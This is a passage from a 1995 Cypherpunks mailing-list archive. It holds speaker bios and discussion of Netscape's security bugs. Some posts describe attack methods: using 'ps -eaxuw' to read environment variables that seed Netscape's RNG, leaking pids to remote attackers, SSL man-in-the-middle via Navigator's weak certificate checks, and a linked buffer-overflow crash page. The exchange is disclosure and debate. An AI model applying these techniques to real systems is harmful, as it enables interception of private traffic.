Institute of Technology in 1985 he spent a year working for Project Athena where he was one of the principal designers of the Kerberos authentication system. Dr. Neuman received M.S. and Ph.D. degrees from the University of Washington, where he designed the Prospero Directory Service which is widely used to locate information from Internet archive sites. His recent work includes the development of a security infrastructure supporting authorization, accounting, and electronic payment mechanisms. Dr. Neuman leads the design and implementation of the NetCheque and NetCash payment systems. 3. Dave Crocker Brandenburg Consulting Title: An Unaffliated View of Electronic Commerce Dave Crocker is the primary author of The EDI on the Internet RFC. He is an active participant in the Internet Engineering and Technical Standards Committee and has influenced numerous internet standards. 4. Dan Connolly Research Associate, MIT/W3C Dan Connolly discovered the web project soon after graduating U.T. Austin in 1990. His industry experience in online documentation tools, distributed computing, and information delivery kept him in touch with the project while he was at Dazel and HaLSoft. His background in formal systems led him to work on the specif ication of HTML and other parts of the web. 5. Professor Donna Hoffman Owen Graduate School of Management Vanderbilt University Donna Hoffman is an Associate Pofessor of Marketing and directs Project 2000, a research program in Computer-Mediated Marketing Environments which is devoted to studying the marketing implications of commercializing the World Wide Web. Examples of current projects include 1) developing the strategic marketing implications of commercial scenarios of the Web; 2) modeling consumer response to advertising and consumer search and purchase behavior in online commercial environments; 3) survey research on Internet usage; and 4) consumer behavior implications of computer-mediated communications. 6. Smoot Carl Mitchell Zilker Internet Park Smoot Carl-Mitchell is Managing Partner in Texas Internet Consulting (TIC), which consults in networks and open systems, with particular emphasis on TCP/IP networks, UNIX systems and standards. He was the principal author of Practical Internetworking with TCP/IP and UNIX, 1993 and is co-author of The Internet Connection: System Connectivity and Configuration. He is also President of Matrix Information and Directory Services, Inc., of Austin. 7. Andrew Whinston The University of Texas at Austin Andrew B. Whinston is the Hugh Roy Cullen Centennial Chair in Business Administration, Professor of Information Systems, Computer Science and Economics and Director of the Center for Information Systems Management. He is editor of two journals Decision Support Systems and Organizational Computing and co-author or co-editor of 15 books and over 250 articles. Recent research interests are Internet pricing and application of client-server computing especially to support groups working collaboratively. 8. Ravi Kalakota Xerox Assistant Professor of Information Systems The University of Rochester Ravi Kalakota received his Ph.D from the University of Texas at Austin. He has been working in the area of electronic commerce since 1992. He is currently focusing on the challenges of organizing for electronic commerce: structured documents, processes/workflows, and broker architectures. His current project is on "New Product Introduction Using the Internet." He is also the co-author of a forthcoming book: The Frontiers of Electronic Commerce (Addison Wesley). 9. Win Treese Director of Advanced Technology Open Market, Inc. Win Treese leads the security and advanced technology groups at Open Market, Inc ., a young company developing systems and software for electronic commerce. He has previously been a member of the research staff at Digital Equipment Corporation's Cambridge Research Laboratory and Chief Systems Engineer at MIT's Project Athena. 10. Larry Masinter Principal Scientist Xerox Palo Alto Reserach Center Dr. Masinter is a principal scientist at the Xerox Palo Alto Research Center. He has been working in the area of document management system architecture since 1988, the Web standards groups from their inception, and the research area of Digital Libraries since 1993. 11. Jill H. Ellsworth Senior Partner, Oak Ridge Research Jill H. Ellsworth, Ph.D., Senior Partner with Oak Ridge Research, is a consultant regarding business on the Internet for Fortune 500 companies, and consultant r egarding business on the Internet for Fortune 500 companies, and is a frequent speaker in North America and Europe about business, marketing and education on th e Internet. A former university Professor and Dean, she holds a doctorate from Syracuse University. Ellsworth is the author numerous books, including The Internet Business Book, Marketing on the Internet, the Internet Business Kit (John Wiley & Sons), and Education on the Internet (Sams/Macmillan). She serves on the Survey Working Group of the Internet Society. 12. Su-Shing Chen Professor of Computer Science University of North Carolina Dr. Chen received his Ph.D.in 1970 from the University of Maryland. He was on th e faculty of University of Florida, Georgia Tech, University of Maryland, and University of North Carolina. from 1983-85 and 1991-95, he served as NSF Program Directors of Intelligent Systems, Knowledge Models & Cognitive Systems, and Information Technology & Organizations. 13. Dr. Arthur Keller Senior Research Scientist Stanford University Dr. Arthur Keller is a Senior Research Scientist at Stanford University. He is Project Manager of Stanford University's participation in CommerceNet, which is doing the first large-scale market trial of electronic commerce on the Internet. He leads the effort on smart catalogs and virtual catalogs. He was Manager of the Penguin project, to provide sharing of persistent object data among multiple applications. He is also working on managing inconsistency in federated, autonomous database systems. His publications include work on database security, databases on parallel computers, incomplete information in databases, database system implementation, hypertext databases, and computerized typesetting. 14. Dr. Jan Stallaert Assistant Professor The University of Texas at Austin Dr. Stallaert received his Ph.D. from UCLA in the area of management science. He has been working in the area of supply- chain management and large-scale logistics problems for several years. He is also a consultant for several Fortune 500 companies. 15. Dr. Preston McAfee Professor The University of Texas at Austin and MIT Dr. McAfee is a leading expert on electronic auctions. He has been retained as the principal consultant by the Federal Communications Commission to devise mechanisms for allocating wireless frequencies. He is also the editor of the prestigious American Economic Review. --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From fair at clock.org Mon Sep 25 10:37:25 1995 From: fair at clock.org (Erik E. Fair (Time Keeper)) Date: Mon, 25 Sep 95 10:37:25 PDT Subject: Persistent Services Needed Message-ID: One way to establish persistent services is to use the DNS for indirection: register a name for a service (or a set of services), which then point to servers of those services by a DNS name. If the service needs to move (hosts, net connections, etc), the only thing that changes is the DNS zone file and the references to the service through the name stay exactly the same. Hell, if your service requires no state information or can have replicated data (e.g. DNS, FTP, WWW), you can use "round robin" techniques with very low DNS RR TTL's to spread the service load over a bunch of widely distributed hosts. The NetBSD gang understand this principle: netbsd.org has several servers all over the place: E-mail to netbsd.org is handled at MIT. www.netbsd.org is served up by WWU.EDU ftp.netbsd.org is at CMU. Perhaps Eric Hughes can be prevailed upon to permit "privacy.net" to be used in this manner. Erik Fair From sameer at c2.org Mon Sep 25 10:46:18 1995 From: sameer at c2.org (sameer) Date: Mon, 25 Sep 95 10:46:18 PDT Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit Message-ID: <199509251741.KAA04656@infinity.c2.org> I was thinking recently how the events of the past week or so have turned me into a sort of a Netscape advocate. Granted, there are bugs in Netscape, and there probably will be more bugs uncovered (someone needs to write an exploit if they want themself & Ray to get a T-shirt btw), but Netscape is interested in fixing problems and the new 2.0 is doing encrypted email, probably with a really nice interface (Haven't seen it yet, of course) and they are working to make the 128-bit version downloadable. (The 128bit version is available overseas already anyway, I hear.) The really big sticking point I see, however, is the certification authorities. There is a single point of failure here and that is at Verisign. This becomes a large problem I think if the en rypted email that Netscape does requires personal x509 certificates (I read that Versign is issuing those for $9/each.) This is a problem because for one thing I don't think Versign will want to issue certs to psudonyms, and Netscape may not talk encrypted email to non-certified people. (I am not sure) The solution to this, of course, is to allow Navigator to accept alternate certification hierarchies, so we can setup a Cypherpunks cert agency or a c2.org cert agency, which -will- sign nym's keys, etc. The question exists though, as to whether or not Netscape will allow for alternate agencies in Navigator. I haven't seen any mention of this feature in 2.0, so if the feature exists in 2.0, then great! Otherwise, unless Netscape is going to allow for alternte cert agencies on a specific timescale, I think we have to do something about it in order to force the issue. Along the same lines of what happened recently-- because of the exposed hole and the pressure put on Netscape, management was finally willing to let some of the code be available for public review. If something happened to show how relying on a single point of failure such as Verisign was bad and resulted in much press & publicity, then perhaps Netscape management would be convinced to allow for alternate cert hierarchies.. Some sort of hack which demonstrates this would be great. I am feeling uncreative and can't think of anything effective short of stealing Verisign's private key, but that would be pretty damn tough. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From patrick at Verity.COM Mon Sep 25 10:46:32 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Mon, 25 Sep 95 10:46:32 PDT Subject: Defense against a class of programming bugs Message-ID: <9509251742.AA21506@cantina.verity.com> > > >Unfortunately, strdup is not posix compliant. If you want to use > >it and maintain portability, you'll have to write your own. > > Er, you're kidding, right? drand48 isn't in Posix either, for example. > Someone who runs on Motif and Mac has strdup as the least of their > worries. But just in case it's stopping anyone: > char *strdup(const char *x) { char *p; > return (p = malloc(strlen(x) + 1)) ? strcpy(p, x) : 0; > } Nah, I'm not kidding...I have to write code that runs on LOTS of platforms including macs, pcs, and lots of variants of Unix...I assume there's a lot of others that do as well...you have to make money where you can, and even with free software given out to the net, you want to make it portable as a matter of pride. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From gorkab at sanchez.com Mon Sep 25 10:52:40 1995 From: gorkab at sanchez.com (Brian Gorka) Date: Mon, 25 Sep 95 10:52:40 PDT Subject: List of US representitives Message-ID: <00996ED487C83F20.00003C77@sanchez.com> Someone posted a list of US reps awhile back... Can someone forward me a copy? Thanks. Brian Gorka -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy/oSvwAAAEEAKM8kn6GkjFgbWUHBXPOtiJuCrhEgMc0Hk8WqERu0aW9bfKN JLdl9iY0g+fDg9HgP6fX7MQx5svwsx4m9Dc7Uynwnm6Na6EKvjozRW7OR5zjf4Fi YYqQ45ZmuU8lokphPGpnl4IZTfC1eWGTAC3G8KmA34x8HQdSCUqS5+bitIhFAAUR tCNCcmlhbiBSLiBHb3JrYSA8Z29ya2FiQHNhbmNoZXouY29tPg== =S8nb -----END PGP PUBLIC KEY BLOCK----- From jonm at netscape.com Mon Sep 25 11:19:15 1995 From: jonm at netscape.com (Jon Mittelhauser) Date: Mon, 25 Sep 95 11:19:15 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <445j6k$h03@tera.mcom.com> Message-ID: <446rp8$14h@tera.mcom.com> adam at lighthouse.homeport.org (Adam Shostack) wrote: >Jeff Weinstein wrote: >| >| More on the RNG stuff. On Unix systems we look for ~/.pgp/randseed.bin, >| and feed it through the RNG hash. On Unix and PC systems we feed the >| environment through the hash, so that would be a good place for a >| concerned user to put some random stuff of their own. > >On a SunOS (or any BSD) box ps -e will get you environment variables. > >ps -eaxuw >USER PID %CPU %MEM SZ RSS TT STAT START TIME COMMAND >root 53 0.0 0.0 68 0 ? IW Sep 19 0:02 portmap HOME=/ >PATH=/bin:/usr/bin:/usr/etc:/usr/ucb >root 68 0.0 0.0 16 0 ? I Sep 19 0:00 (biod) >root 58 0.0 0.0 40 0 ? IW Sep 19 0:00 keyserv HOME=/ >PATH=/bin:/usr/bin:/usr/etc:/usr/ucb If you take a look at the code you will see that this (and a ton of other things) are already being done...Jeff is only pointing out an extra item which is of special interest to the people in this group...we are no longer relying on any single item of data but rather a very large set and constant re-seeding during idle loops... -Jon From jlasser at rwd.goucher.edu Mon Sep 25 11:57:48 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Mon, 25 Sep 95 11:57:48 PDT Subject: Notes security question In-Reply-To: <199509230133.VAA05532@gold.interlog.com> Message-ID: On Fri, 22 Sep 1995, Herb Sutter wrote: > While I'm at it, here's a question I've been wondering about recently: Why > is it I've never heard of any security issues with Lotus Notes? Are there > no known weaknesses? Or did existing weaknesses just not get much press > because Notes isn't a commercially visible consumer product like Netscape? Perhaps the Notes pricing scheme is sooo outrageous (by the standards of a student like myself, and probably most others, if it's still anything like it was at the 1.0 release) that mostpeople have had zero opportunity to examine the program, let alone really have time to play with it? Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From jlasser at rwd.goucher.edu Mon Sep 25 12:02:32 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Mon, 25 Sep 95 12:02:32 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: Message-ID: On Fri, 22 Sep 1995 dmandl at panix.com wrote: > On Fri, 22 Sep 1995, Adam Shostack wrote: > > > Perry E. Metzger wrote: > > > > | I don't believe the Sun Java stuff would suffer from it, although I > > | fear Java a great deal. > > > > I keep hearing this thought. Isn't Win95 with its > > 'executables in email' much more dangerous than Java, which at least > > tries to address security? > > Is that the new MS-Word you're thinking of? I hear that it lets you > imbed macros containing executable code in documents. That's got to > be one of the most dangerous ideas ever cooked up. Agreed; but it's present, not just in Word (every version since 2.0, as far as I can tell, in fact, since they all let you make system calls...), but in Microsoft Network, Microsoft Access, Microsoft Excel... I believe PowerPoint and Publisher are exempt from this bug, if only because the current versions have no macro languages... One of the penalties that modern software (at least for Windows) imposes is the ability to create massive viri, simply by allowing system calls to be executed from macros (if this was not the case, OLE technology wouldn't work, and interoperation between Windows programs can't occur, thereby crippling the system through bad design regardless of which alternative was chosen) Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From jgrubs at left.webcasters.com Mon Sep 25 12:03:16 1995 From: jgrubs at left.webcasters.com (Jim Grubs W8GRT) Date: Mon, 25 Sep 95 12:03:16 PDT Subject: CyberAngels In-Reply-To: <9qJZBD1w165w@left.webcasters.com> Message-ID: <6RZZBD1w165w@left.webcasters.com> To: morning at npr.org Cc: root Subject: CyberAngels From: jgrubs at left.webcasters.com (Jim Grubs (W8GRT)) Reply-To: jgrubs at left.webcasters.com (Jim Grubs (W8GRT)) Message-ID: <9qJZBD1w165w at left.webcasters.com> Date: Mon, 25 Sep 95 09:09:55 EDT Organization: WebCasters(tm) -----BEGIN PGP SIGNED MESSAGE----- Just what this world needs -- more vigilantees. To my mind, they are the moral equivalent of the right wing militia groups. A technical point: The piece would have the people who are not computer literate believe that GIF and JPG are code words for porn pictures and are used only in that context. The truth is they are merely computer filename extensions used for two different graphical data formats. You will also find GIF and JPG formatted images used on the Whitehouse WWW page, the Library of Congress' THOMAS, and the WWW page for the Pope's visit to Baltimore - not to mention the WWW page I just created for a customer selling polluted water filtration systems. I have never in my 62 years witnessed any news story on any subject about which I had any personal knowledge or expertise that did not contain factual errors. Is it any wonder that people are increasingly skeptical of the news media? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: LIBERTY!! Use it or lose it!! iQCVAwUBMGavg974r4kaz3mVAQG+AgP9GWJ7B7QPCuIQ0HRhAebFkQHODTakPBQv jHgaIZGrCkCcYVZ3BaVl1aYdDhCMDekkw6gfj9kcdlYN96sVxkqLv9gFVIZMu0sk 7/j4o9ishO8ALmZx7DYxhVfJZhCwYq7a5hZZaGz9nLxdRaQnzUNsYJKeE0bBfdLI ZnPKM34WB0k= =qELG -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at left.webcasters.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programming, Information brokering From bianco at itribe.net Mon Sep 25 12:08:53 1995 From: bianco at itribe.net (David J. Bianco) Date: Mon, 25 Sep 95 12:08:53 PDT Subject: Persistent Services Needed In-Reply-To: Message-ID: <199509251905.PAA28033@gatekeeper.itribe.net> On Sep 25, 10:36, "Erik E. Fair" (Time Keeper) sent the following to the NSA's mail archives: > Subject: Re: Persistent Services Needed || One way to establish persistent services is to use the DNS for || indirection: || register a name for a service (or a set of services), which then point to || servers of those services by a DNS name. If the service needs to move || (hosts, net connections, etc), the only thing that changes is the || DNS zone file and the references to the service through the name stay || exactly the same. Hell, if your service requires no state information || or can have replicated data (e.g. DNS, FTP, WWW), you can use "round || robin" techniques with very low DNS RR TTL's to spread the service || load over a bunch of widely distributed hosts. || Sounds like a good idea to me. I've always kinda wondered why there wasn't a cypherpunks.org or something. It'd certainly make it easier for folks to find us... -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From vznuri at netcom.com Mon Sep 25 12:28:47 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Mon, 25 Sep 95 12:28:47 PDT Subject: PM's Netscape rant Message-ID: <199509251924.MAA05096@netcom18.netcom.com> I thoroughly enjoyed PM's vituperative, venemous, and vitriolic Netscape rant. it just wouldn't be the cypherpunks list without the pit bull of the internet nipping at everyone's heels here and slaying any unwarranted peace!! however I haven't seen any well-deserved rebuttals however, so.. I'm again going to be a netscape apologist and say, GEEZ, PM, will you take it easy, and untangle your underwear knots? as has been pointed out numerous times, the encryption in the Netscape code is designed to handle credit card number transport, *not* actual cash transport. its really silly to have more security present than is available than the weakest link. it would be like worrying about a fence around the white house when one is giving open tours to the public every day!! PM is rather secretive about the systems he is working on, but I suspect they are stock systems that must be highly secure because they actually involve *transfer* of cash, and *large*amounts* of it, in a *time-critical* environment, with *large corporate clients*. these are all inappropriate criteria to judge Netscape by. in the Netscape scenario, the software is *not* transfering cash itself, *not* transferring large amounts of it, and *not* in a time critical application, and *not* geared toward large corporations, but instead individual users. it is relying on another infrastructure (credit cards) for the actual transaction mechanisms. as has been pointed out numerous times, the whole credit card apparatus is somewhat based on "security through obscurity", i.e. the obscurity of a credit card number, and it doesn't make a whole lot of sense to try to make this more "secure". this is a problem for credit card companies to fix (I agree it is a horrible problem, that costs us billions, and should have been fixed a long time ago) .. but holding credit card *using* companies responsible for this deficiency doesn't make sense. they are not the enemy!! they would surely seize the most secure mechanism available, if there were alternatives. the distinction is subtle, but I think a relevant one: is the software itself transfering cash, or building on another system that does so? hopefully in the latter case, the requirements for a successful implementation are not so difficult to achieve (so that even fresh-out-of-college CS students can call the functions to do so, and perhaps code packages are written such that the user is protected from their own naivete, or what PM would call stupidity or incompetence). -- PM gives some excellent techniques for improving code security (some of these may not be exactly what he proposed): 1. hiring experts 2. code reviews 3. restrictions of who can work on what code (security clearance) 4. heavy testing 5. antagonistic attacks (i.e. hiring someone trying to crack the code that others have written) 6. open review of key code however, put all these things together and you get a company apparatus a bit more like the NSA than a commercial company. I agree that all these precaution are relevant for banking and stock transaction software transferring millions of dollars. but holding a joe-schmoe GUI and Web company responsible for this kind of paranoid oversight is really impossible and unrealistic and *unnecessary*. there will be some companies that specialize in creating the *secure*infrastructure* for communications transactions. other companies will just *latch on* to this existing infrastructure. hopefully the requirements for *latching on* will not be too difficult, otherwise we are all in trouble!! now, admittedly, it would be ideal if the netscape code was highly secure, but again, I just don't think it is in the best interests of this company to become security paranoid to the degrees that I have listed above, and the extreme degrees that people here are ranting about. rather they should try to blend in with other companies who specialize in cryptographic security. the latter companies should as much as possible provide foolproof modules. they should take care of all functions that have a potential for problem, such as random number generation, key exchange, etc. they should try to provide a minimum of training where the code is not foolproof. many have been making the point that one cannot judge the security of a package based simply on analyzing key modules. I actually don't think this has been proven in general and completely resolved yet. I can imagine modules that communication with software such that the module itself is a "secure environment" in general, and it is almost impossible to misuse the software itself. (for example, the software might never store the actual keys of transactions itself, this being handled by a secure module, making it impossible to accidentally reveal them). some day we might actually see "secure module support" built into a microprocessor. in many ways the microprocessors that guard against illegal memory accesses and illegal function calls are in a sense providing a kind of cryptographic security. and people who study secure OSes generally eventually conclude that for ultimate security, you almost have to work from the ground up, starting with memory, microprocessors, and network hardware. -- so my general point is that PM's rant, while lots of fun to read.. >you @#$%^&* whippersnappers!! you don't have a @#$%^&* clue about >REAL code!! us old timers were writing code as secure and impenetrable >as granite bricks, impregnable as a frigid victorian gandmother, >before you were a twinkle in your mama's eye!! learn some >sufficent grovelling skills for your superiors or you will >not only be fired from your JOB but be excommunicated from the >entire INDUSTRY, perhaps even tarred, feathered, drawn, quartered, and >hung from your neck in the nearest tree!!! your employer will throw >you to the wolves, your customers will spit on your flayed carcass, >your family will look upon your shrivelled remains with shame, the >vultures will vomit your undigestable eviscerated entrails, >and the world immediately explode, if you have a >SINGLE BUFFER OVERFLOW *anywhere* in your code!! (ahem) this is not appropriate in the context of Netscape's aims, unless they want to become financial transaction experts more in line with banking expertise. netscape is more a "bring cyberspace to the masses" company, not "bring secure transactions to cyberspace". it's just because so few companies are successfully doing the latter, that netscape is forced to implement some "key" aspects of it to support the former. but I suspect they may ease out of the cryptographic security business in the long run, delegating it to other companies' plug-in-packages. furthermore, cyberspace is growing gradually. the way we get to really incredible secure transactions is through a growing process, an evolution in which mistakes are made at different levels, and which in the beginning the software is not much more than a toy that looks pretty and has the fewest moving parts and most simplistic design imaginable. I fully believe that some day a company in cyberspace will exist that satisfies PM's and all other cypherpunk's most erotic dreams about secure transactions. however that day is years away and it will take a long time to reach it. and I doubt that it will be the same company that is playing around with GUI's for the end user and hiring college programming hot-shots and Java geeks. IMHO netscape is probably not going to be the company that will try to bring the *lowlevel infrastructure* for cash, judging by the current winds, although that could change. they will definitely help guide its progress and be interacting with the companies that do, however. when the big Secure Transactions Inc. company is invented for cyberspace, *then* the kinds of absolutely uncompromising standards that PM embodies will be in place. but again, we cannot expect the companies of today to embody that ideology and atmosphere for a few years yet. the cypherpunks play a very valuable role in finding these "growing pain" mistakes of beginning companies such as Netscape, but we are not really serving our own best interests or the harmonious growth of cyberspace by vilifying/ embarrassing/ browbeating/ humiliating companies or their employees over their security problems, at least if they are clearly responsive to far less ammunition. keep in mind that NSA unbreakable security is *just*not*appropriate* in every situation, and in fact "weak" encryption does have legitimate uses (i.e. in a world where people routinely lock their keys in their cars). (although I agree, in general one should always try to design a system to be as secure as possible.) (oops, I used the term "we" in that paragraph, a grave cypherpunk sin.. my humble apologies; @#$%^&* cryptoanarchist vocabulary) that all said, nevertheless, I do enjoy PM's periodic displays of undigestable bile eruptions at least as much as one of the other infamous amusing crackpots circulating in this corner of cyberspace.. (but geez, PM, were you raised by a pack of wild wolves or what?) p.s. to TCM: why do you continually find my login name abbreviation so fascinating??? my apologies to anyone if I am missing some kind of inside joke here, I'm a little dense at times From ses at tipper.oit.unc.edu Mon Sep 25 12:53:39 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Mon, 25 Sep 95 12:53:39 PDT Subject: SSL Man-in-the-middle In-Reply-To: <199509251247.IAA27297@gatekeeper.itribe.net> Message-ID: I can confirm that, at least up to 1.2, netscape navigator does not do any validation beyond checking the signer of the certificate. Exactly - the trust model used in Navigator 1.1N requires you to trust every single owner of a valid certificate. Getting hold of any key is vastly easier than having to obtain a specific key; in the worst case, you just buy your own - SSL exchanges are repudiable, and a few simple tricks can make sure you cerificiate doesn't show up in the "Document Information" dialog box. Or, since there are is CRLing, accidentaly lose you private key, notify verisni and get a revocation. To detect the attack without using either a modified client, or a nice proxy that checks for you, you must do packet-tracing on all SSL connections, regenerate the exchange, and then review each exchange to look for suspicious certificates. From daw at CS.Berkeley.EDU Mon Sep 25 12:58:06 1995 From: daw at CS.Berkeley.EDU (David_A Wagner) Date: Mon, 25 Sep 95 12:58:06 PDT Subject: netscape bug Message-ID: <199509251957.MAA15095@quito.CS.Berkeley.EDU> In article <199509201855.LAA17261 at netcom16.netcom.com> you write: > > none of the articles mention that the cracker must have login access > to the computer that the random numbers are generated on. is this true? > does the code require knowledge of the PID etc. that can only be obtained > by a login to the system that the netscape session is running on? > No, the time, pid, and ppid often leak to a remote adversary too. The attack probably requires a bit more sophistication when the cracker doesn't have login access, but I believe it's still possible. See my recent post to sci.crypt for some comments from Ian & I about this. From shamrock at netcom.com Mon Sep 25 13:30:55 1995 From: shamrock at netcom.com (Lucky Green) Date: Mon, 25 Sep 95 13:30:55 PDT Subject: List of US representitives Message-ID: <199509252028.QAA18640@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <00996ED487C83F20.00003C77 at sanchez.com>, gorkab at sanchez.com ("Brian Gorka") wrote: >Someone posted a list of US reps awhile back... Can someone forward me a copy? Everything you need to know put pressure on Congress critters is at http://www.NRA.org/pub/congress/104/ I especially recommend http://www.NRA.org/pub/congress/104/congress.awk.Z - From the readme: "congress.awk is a comma-seperated database of congress members & some unix awk code for manipulating the database" - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGcQ9ioZzwIn1bdtAQHKLwGAnzE6f67qn0bZFVcOV/49gemiD9jAluJo ageYFxFsIIbkD9q28/a/7yX/GKaDNTSu =0h5T -----END PGP SIGNATURE----- From daw at CS.Berkeley.EDU Mon Sep 25 13:32:16 1995 From: daw at CS.Berkeley.EDU (David_A Wagner) Date: Mon, 25 Sep 95 13:32:16 PDT Subject: Exchange random numbers (was: Re: netscape's response) Message-ID: <199509252031.NAA15134@quito.CS.Berkeley.EDU> In article <199509211852.LAA22259 at Csli.Stanford.EDU> you write: > > | If I only ever give out a hash of my seed, and only ever *add* any received > | info to my seed (and stir it in well), how can anyone find out anything? > | (Apart from hash weaknesses.) > > Giving out contribution: > MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote > Taking in contribution : > my_seed = my_seed XOR > ((select_low_bits(remote_contrib, contrib_width) << contrib_area) > People seem to think this kind of thing is obviously safe. I'm not yet convinced. By xoring in a quantity *chosen by your adversary*, you're essentially allowing related-key attacks on your stream cipher. (Your PRNG is just a stream cipher, keyed with my_seed.) Noone knows how secure most ciphers are against related-key attacks: related-key attacks are known to be very powerful (often more powerful than any other type); but very little research on this topic is available. You're treading on unknown ground. There's the also a small error in your specific algorithm. Let n = stop_bit - start_bit; presumably n is much less than the length of your seed. Then a brute-force search over n bits will recover n bits of the seed -- this is a much faster cryptanalysis than a brute force over all bits of the seed. This can probably be fixed by something like MD5(select_bits(MD5(my_seed))) -> remote, but the related-key uncertainties still remain. From fletch at ain.bls.com Mon Sep 25 13:39:29 1995 From: fletch at ain.bls.com (Mike Fletcher) Date: Mon, 25 Sep 95 13:39:29 PDT Subject: Article in 9/25 Computerworld about Netscape Message-ID: <9509252034.AA08024@outland> Just got the Sept 25th issue of Computer world in my box and it's got a big first page article on the NS bugs. They get the key lengths wrong (30-bit and 300-bit), and they say that "... future products will also use 300-bit keys." And they mention Cypherpunks by name! :) --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From herbs at interlog.com Mon Sep 25 13:39:55 1995 From: herbs at interlog.com (Herb Sutter) Date: Mon, 25 Sep 95 13:39:55 PDT Subject: Notes security question Message-ID: <199509252039.QAA12982@gold.interlog.com> At 14:52 1995.09.25 -0400, Jon Lasser wrote: >On Fri, 22 Sep 1995, Herb Sutter wrote: > >> While I'm at it, here's a question I've been wondering about recently: Why >> is it I've never heard of any security issues with Lotus Notes? Are there >> no known weaknesses? Or did existing weaknesses just not get much press >> because Notes isn't a commercially visible consumer product like Netscape? > >Perhaps the Notes pricing scheme is sooo outrageous (by the standards of >a student like myself, and probably most others, if it's still anything >like it was at the 1.0 release) that mostpeople have had zero opportunity >to examine the program, let alone really have time to play with it? Good point. However, since it's been around for years and is (in some people's eyes, at least) cutting-edge secure replication technology, it made me begin to wonder about the product's actual security. All I know is that they use one of RSADSI's libraries, since RSADSI mentions them in their "here are our current users" advertising. >From the deafening silence, though, it seems like there's not a whole lot of information or opinion either way on Notes' security...? Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019 From dl at hplyot.obspm.fr Mon Sep 25 13:47:57 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Mon, 25 Sep 95 13:47:57 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com> Message-ID: <9509252047.AA01994@hplyot.obspm.fr> It's not an exploit script, but you can find an auto crash "animation" for Ray's discovered bug on http://hplyot.obspm.fr/~dl/netscapesec/c1.html (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/) Btw, from my tests, looks like the SunOs version is not crashing after 356 bytes like my first HPUX/Solaris test but needs a slightly longer url, if folks can try out the above urls and confirm/infirm crash for other platforms, thx ! dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept assassination North Korea terrorist SEAL Team 6 radar supercomputer PLO From raph at CS.Berkeley.EDU Mon Sep 25 14:01:53 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 25 Sep 95 14:01:53 PDT Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit In-Reply-To: <199509251741.KAA04656@infinity.c2.org> Message-ID: <199509252101.OAA09395@kiwi.cs.berkeley.edu> I agree with Sameer's points here. Netscape carries with it the potential of revitalizing the cypherpunks agenda, but also, in the worst case, making it irrelevant. What happens, I think, depends on what we do. On the plus side, Netscape 2.0 will, without a doubt, be the first usable mail tool to incorporate real encryption. It may accomplish, almost overnight, the long-held goal of making a nontrivial fraction of Internet email secure. Another potentially big win is the Java language. It seems to me that it will be quite plausible to code up real crypto applications in this language. Once coded, these applications will run on every important platform in the universe, and can be accessible by the click of a mouse. Perl-RSA was a sign of what's possible in the non-C world. One caveat is the slowdown from the interpreted code (roughly a factor of 25). The best way to look at this is as a challenge, to use clever coding tricks and intelligent architectures, including caching. The speed of Java implementations will inevitably improve - in fact, I might just be doing my PhD thesis on memory management in Java. One potential downside, as Sameer points out, is the X.509 certification hierarchy. This ancient beast has the potential to defeat many of the cypherpunk aims, most especially the possiblity of anonymous communication. However, that's not a foregone 